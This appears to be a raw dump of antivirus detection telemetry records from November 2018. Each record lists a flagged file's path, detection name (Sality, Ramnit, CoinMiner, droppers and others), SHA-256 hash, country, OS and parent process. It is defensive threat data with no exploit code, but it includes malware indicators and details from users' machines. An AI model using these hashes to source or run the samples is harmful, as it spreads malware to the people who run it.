  Row(detection=Row(filename='avscan-20181101-095310-62cf7ef9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095310-62CF7EF9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:53:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nrwkt1cbcmk\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T06:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093407-87e4b0f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093407-87E4B0F0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pasticciere.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\PASTICCIERE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='italiano.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cqdhxphb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\cqDhxPhb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cinvestav                                   .scr', filepath='E:\\Cinvestav                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095147-52f04101', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095147-52F04101', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074523-68d00fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074523-68D00FCB', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mszqbtp.exe', filepath='C:\\ProgramData\\mszqbtp.exe', filesize=102800000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='857e42267b1f1c2b7ad0c9b55da324f70718cf4e6060c59d6f488033a0ade108', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T05:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094242-ea8fc92a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094242-EA8FC92A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:42:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152143-86318daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152143-86318DAA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-135555-5d268c9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41bd894e\\AVSCAN-20181101-135209-42DB619E\\AVSCAN-20181101-135555-5D268C9E', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:56:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213623-5b8733be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213623-5B8733BE', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:36:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='E:\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcd73457116984953123e8b52cafeed9590b7abee1e72e4e9bad0a6d601c0e66', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZqvQCDdw1Uq6w+Sx.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\1pe4doaspfw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/SkipUac', country='AE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8370448, timestamp='2018-11-01T11:07:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e9e44ea6bbe8b7293c404cbc0146cf1755eed244d4e480453eab93314f8ba447', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E9E44EA6BBE8B7293C404CBC0146CF1755EED244D4E480453EAB93314F8BA447', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e9e44ea6bbe8b7293c404cbc0146cf1755eed244d4e480453eab93314f8ba447', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:32:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='D:\\PrFiles\\WinRAR\\Uninstall.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='6a3acd5487710dba2014eca5b45b7ee58b513e4af93c1f722c4ddd2f0840cc33', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\regsvr.exe', parentsize=1136128, timestamp='2018-11-04T06:51:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T02:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:26:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135029-29225330', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135029-29225330', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:50:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vghd.exe', filepath='g:\\programms\\v-girl\\bin\\vghd.exe', filesize=3264000, name='W32/Ramnit.CD.#M1.#R1'), hash='1139f690ebabc8d11f3684e8d2fb02c67d09381d7312d55047d33e8292bf1c05', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001801-90a6e2e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001801-90A6E2E6', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:47:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T09:05:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='twhvna.exe', filepath='E:\\twhvna.exe', filesize=128000, name='TR/Onlinegames.993.#M1.#R1'), hash='35b26007a3eef722e9d4fe59ccbbcaa35c6b43486b8d578c211ae171ed865fec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T11:35:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pfsmerge.exe', filepath='C:\\Program Files\\DHI\\2009\\bin\\pfsmerge.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R3883'), hash='106350d96b0849401dbd3c2c0635f2da90fe30d9a37e2ace90d9b919db5a3fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:04:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hegde sirsi-05-09-18 .exe', filepath='G:\\HEGDE SIRSI-05-09-18 .EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='16635418f3793f65a3739a733d3d24fe75af76761dad2aee98b39c8966d1a740', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T12:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 2.2.exe', filepath='F:\\Проф\\Опись документов 2.2.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='7e182aaf57155e67af0646ce8836bc8ea908644d83c6c6a473397940503af9f8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.vir', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3825496\\MNNStubSetup.VIR', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:38:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T18:12:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\FLASHUPDATE.EXE', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe16_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:36:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150151-65567fe5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150151-65567FE5', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:01:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:36:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:22:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200909-4ee99ccb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200344-27575B99\\AVSCAN-20181104-200909-4EE99CCB', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.hfyqb.#M0.#R0'), hash='9255084356efc294cc973f849c4247ecf135f0a5bb5959273cfe55a085c72405', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:04:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gardeningenthusiast-ttab02-2ac3e9e9cf35202ad2827766ceade26b.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181102-Tooltab\\GardeningEnthusiast-TTAB02-2AC3E9E9CF35202AD2827766CEADE26B.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-04T04:27:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='D:\\\xa0.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:44:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdiskserial.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GetDiskSerial.exe', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='led_blinker-setup-downloader.exe', filepath='E:\\download\\LED_Blinker-Setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='65db021477c147d837ca7b06a395104cc6bcd8fab939c25ff344153710aabfc2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T06:30:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:00:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155024-cc4a413c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c344ac57\\AVSCAN-20181104-154933-C3D82CD7\\AVSCAN-20181104-155024-CC4A413C', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:50:33Z'), dt=datetime.date(2018, 11, 4)),
